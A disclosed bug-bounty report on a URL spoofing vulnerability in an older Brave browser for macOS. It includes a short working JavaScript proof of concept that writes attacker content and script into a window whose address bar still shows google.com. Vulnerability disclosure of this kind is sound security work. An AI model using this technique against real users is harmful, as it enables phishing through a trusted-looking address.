URL spoofing in Brave for macOS

Disclosed: 2018-10-04 00:50:38 By metnew To brave
Medium
Vulnerability Details
## Summary: URL spoofing vulnerability. ## Repro ``` <script> window.onclick = function () { x = window.open('https://www.google.com/csi'); setTimeout(function () { x.document.write(`I am not a www.google.com;<button onclick="alert('I can run JS on this page!')">click me</button>`) }, 100); } </script> ``` URL in address bar is `https://www.google.com/csi`, but actually that's about:blank page. Attacker could inject arbitrary content and execute javascript on this page. Additionally, during alert(), address bar continue displaying `www.google.com` ## Products affected: Brave 0.22.810 V8 6.7.288.43 rev 8f30eeb Muon 7.0.6 OS Release 17.6.0 Update Channel Release OS Architecture x64 OS Platform macOS Node.js 7.9.0 Brave Sync v1.4.2 libchromiumcontent 67.0.3396.71 OS: macOS 10.13.5 17F77 x86_64 ## Impact Typical URL spoofing vulnerability impact. Could be explained, if required.
Actions
View on HackerOne
Report Stats
  • Report ID: 369086
  • State: Closed
  • Substate: resolved
  • Upvotes: 14
Share this report